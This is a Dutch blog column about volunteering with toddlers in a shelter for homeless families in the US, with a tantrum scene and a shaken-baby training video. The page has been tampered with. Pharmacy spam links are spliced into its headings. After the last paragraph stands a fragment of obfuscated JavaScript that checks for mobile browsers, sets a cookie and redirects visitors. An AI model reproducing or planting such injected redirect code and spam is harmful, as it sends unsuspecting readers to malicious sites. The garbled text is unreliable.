Hersenen: net jelly

Hij is twee jaar oud en boos. Dus ligt hij op de grond, graaien zijn handen in de lucht, stampen zijn voeten in het niets, schudt zijn hoofd woest heen en weer en schreeuwt hij onverstaanbare dingen.

Woeste woestheid
Een andere peuter staat er beteuterd bij en ik eigenlijk ook. Wat doe je met een tweejarige die je net streng terecht hebt gewezen waardoor zijn kleine lichaampje grienend van onzekerheid, frustratie en woede ligt te kronkelen op de vloer? De juf haalt haar schouders op en ik gok dat het ‘laat maar even’ betekent.

Not a perve
Een dag eerder kreeg ik een blauw briefje in de brievenbus waarop stond dat ik met kleine kinderen mag werken en dat ik het papiertje goed moet bewaren. In feite betekent het dat ik geen perverse persoon ben. Het briefje hangt nu op de koelkast, want ik vind het mooi: een bewijs van mijn onschuld. Maar ik heb zojuist wel een kind aan het krijsen gemaakt en straks stikt hij in het hysterische gesnik, of breekt hij een voet doordat hij in plaats van lucht een andere peuter schopt.

Hersenen: net jelly http://www.hobagep.hu/hirek/buy-colchicine-tablets/
Met het blauwe briefje in mijn tas toog ik naar het opvanghuis voor dakloze gezinnen. Voor ik mocht beginnen bij de peuters moest ik een video bekijken over het ‘shaken baby syndrom’.’ Als je een baby maar hard genoeg schudt worden de hersenen vloeibaar denk ik’, zei een deskundige in de video. ‘Maar er is goed nieuws: je hoeft een baby niet hard te schudden.’ Daarna werd ik ingedeeld bij de peuters die krijsend werden gescheiden van hun ouders die een paar verdiepingen hoger zouden gaan oefenen op sollicitatiegesprekken en in het computerlokaal zoeken naar beschikbare banen. Sommige kinderen wonen al bijna een jaar in het tehuis.

Motherfucker! Cost of flomax at walgreens
‘Motherfucker!’, roept een tweejarig jongetje naar een leeftijdsgenootje. ‘Shut up stomme neger’, roept die woest terug. Ik trek de twee vechtersbazen uit elkaar, zet de een op een bankje in een hoek en wil ander op een stoeltje verderop plaatsen. Maar dan ligt hij al op de grond, komt er stoom uit zijn oren en schudt zijn lichaampje woest heen en weer. De juf haalt haar schouders op en knikt me vriendelijk toe, terwijl ik angstig denk aan het filmpje waar een animatie liet zien wat er met de hersenen gebeurt als ze maar hevig genoeg schudden. ‘Het lijkt een beetje op jelly’, zei de deskundige triest. l|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Jonkvrouw Jet is 28 en volgde vorig jaar de presidentsverkiezingen in de VS. Nu onderzoekt ze hoe Amerikanen worden geraakt door de economische crisis.

Laat een bericht achter